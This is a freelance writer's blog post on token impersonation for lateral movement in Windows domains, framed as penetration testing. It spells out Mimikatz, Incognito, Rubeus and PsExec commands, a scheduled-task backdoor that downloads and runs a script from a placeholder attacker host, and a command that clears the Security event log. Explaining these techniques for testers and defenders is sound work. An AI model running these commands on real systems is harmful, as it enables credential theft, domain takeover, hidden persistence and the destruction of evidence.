Breaking the Chain- Exploiting Token Abuse for Lateral Movement

Daksh Kaur is a freelance cybersecurity writer who has worked with top brands like SecurityHQ, Red Sift, DuoCircle, EasyDMARC, and PowerDMARC. She creates blogs, articles, eBooks, whitepapers, and newsletters on topics like email phishing protection and penetration testing. Connect with me at daksh@turtlewords.com to talk about content creation for your business.

Daksh Kaur

March 9, 2025
1:31 pm

Penetration testers can steal a user’s identity without even breaking their password. This is done by simulating a token impersonation attack, which is more like a digital mask. A token is like a backstage pass users get when they log in to a system or software. In technical terms, a token is a data element used as proof of a person’s inherent ID or their rights to access network sources. Whenever a user logs into a system, they get an access token that contains information about their identity and access rights. These tokens stay active during the user’s session, acting as proof of their identity and permissions.

If a penetration tester gets unauthorized access to this token, they can pretend to be a legitimate user and perform operations with their privileges. This blog revolves around how pen testers simulate token impersonation and use it to perform escalation.

What is token impersonation?

Token impersonation is a pen testing technique in which a tester obtains domain admin privileges if the logged-on user is a domain administrator. It’s commonly seen in Windows environments and is considered a key method in post-exploitation attacks. Once they get their hands on the user token, they make lateral movements and sometimes even pivot to other domain machines that are on the same network.

Token impersonation is one of the frequent methods that real-world hackers use to break into systems. This tactic has become a headache for cybersecurity analysts, primarily because distributed systems and service-oriented architectures have taken center stage. Since these models spread access decisions across multiple parties, they create more points for attackers to exploit. That’s exactly why penetration testers simulate it regularly.

Types of tokens impersonated by penetration testers

In the Windows environment, there are two types of tokens that are crucial for penetration testers: impersonation tokens and delegation tokens. They help figure out how exactly a process can flow on behalf of another user.

1. Impersonation tokens

An impersonation token allows a process to temporarily adopt the security context of another user on the same machine. This is commonly used when a server process needs to perform tasks on behalf of a connected client.

Penetration testers exploit impersonated tokens using tools like Mimikatz or Incognito. They often simulate this attack on services running with SeImpersonatePrivilege because it lets them impersonate privileged accounts.

Example of Mimikatz command for token impersonation:

mimikatz.exe “privilege::debug” “token::elevate” “exit”

2. Delegation tokens

A delegation token is considered a stronger version of impersonation tokens. It allows a process to act on behalf of another user across different systems in the same network. This is more often used in scenarios like Kerberos delegation, in which a web server accesses resources on a separate database server using the client’s credentials.

Penetration testers abuse delegation tokens in Kerberos delegation attacks and usually pair them up with Rubeus. This allows them to manipulate tokens for privilege escalation or remote system access.

Example of Rubeus command for token delegation attack:

Rubeus.exe tgtdeleg /user:targetuser /rc4:HASH /domain:targetdomain

A general flow of the simulated token impersonation attack

Here’s a detailed breakdown of the process using Mimikatz, Incognito, and PsExec:

Step 1: Gaining access (post-exploitation prerequisite)

Pen testers usually begin by gaining an initial foothold on the system they are targeting. This is done through a combination of tactics like social engineering, phishing, credential stuffing, or exploiting a vulnerability. Once they get secure access, they escalate privileges to NT AUTHORITY\SYTEM to get their hands on high-privilege tokens. For example, operating a Meterpreter session by running the getsystem.

Step 2: Enumeration

When they get elevated access, their next step is the enumeration of available tokens so that they can figure out which ones are linked with privileged accounts. White hat hackers can use Mimikatz and run the code mimikatz.exe “privilege::debug” “token::list” to see all the tokens that are associated with crucial accounts like Domain Admins or Local Administrators. They usually look for tokens that are marked as ‘delegation’ or ‘impersonation’ as they are ideal of lateral movement.

Step 3: Impersonate a token

So, after they identify an exploitable token, they impersonate it to adopt the security context with which it’s linked to the targeted account. Mimikatz allows this by executing mimikatz.exe “token::elevate”. Alternatively, within a Meterpreter session, testers can load Incognito, list available tokens with list_tokens -u, and impersonate one using impersonate_token “DOMAIN\Admin”.

Step 4: Pivot to another system (lateral movement)

With a valid impersonated token, the tester can proceed to execute commands on remote systems. Tools like PsExec simplify this step by allowing testers to run commands directly on target machines. For example, the command psexec.exe \\<TARGET_IP> -u DOMAIN\Administrator -p <PASSWORD> cmd.exe opens a remote command shell, while psexec.exe \\<TARGET_IP> -s powershell.exe -Command “Invoke-Command {whoami}” runs PowerShell commands remotely.

Step 5: Abuse Kerberos for domain-wide access

In cases where the Kerberos delegation is misconfigured, testers can abuse this by extracting TGTs (Ticket Granting Tickets) using Rubeus. Commands like Rubeus.exe dump can extract tickets, while Rubeus.exe ptt /ticket:<BASE64_TICKET> allows testers to inject a stolen TGT, enabling domain-wide impersonation. Following this, testers can confirm access by listing shared resources with commands like dir \\<TARGET_IP>\C$.

Step 6: Maintain persistence

To maintain access after successful lateral movement, establishing persistence is crucial. This can be achieved by creating scheduled tasks or services. For instance, the following PowerShell command sets up a recurring backdoor:

schtasks /create /tn “Backdoor” /tr “cmd.exe /c powershell.exe -c ‘Invoke-WebRequest -Uri http://<attacker_ip>/shell.ps1 -OutFile C:\backdoor.ps1; Start-Process C:\backdoor.ps1′” /sc minute /mo 5 /ru System

Step 7: Clean the traces

At last, ethical hackers need to properly clean up their route so that there is no evidence of the breach. Cleaning using wevtutil cl Security can reduce noise, but this needs to be done with caution while sticking to the guidelines. Also, it’s important to ensure that tokens are revoked and system changes are reverted so that the integrity doesn’t take a hit.

Throughout the entire process, penetration testers should follow authorized Rules of Engagement (RoE), document their actions, and provide detailed reports to help the organization improve its security posture.

Did you like the blog?

Hey there! I’m Daksh Kaur, a freelance cybersecurity writer passionate about breaking down complex topics like email authentication, vulnerability assessment, and penetration testing. My goal? To write in-depth technical blogs that don’t feel like you’re decoding a cipher.

I’m currently looking to team up with a cybersecurity company for a long-term freelance collaboration. Your brand + my expertise = the ultimate power combo!

Let’s chat at daksh@turtlewords.com — I’m all ears (and keyboards)!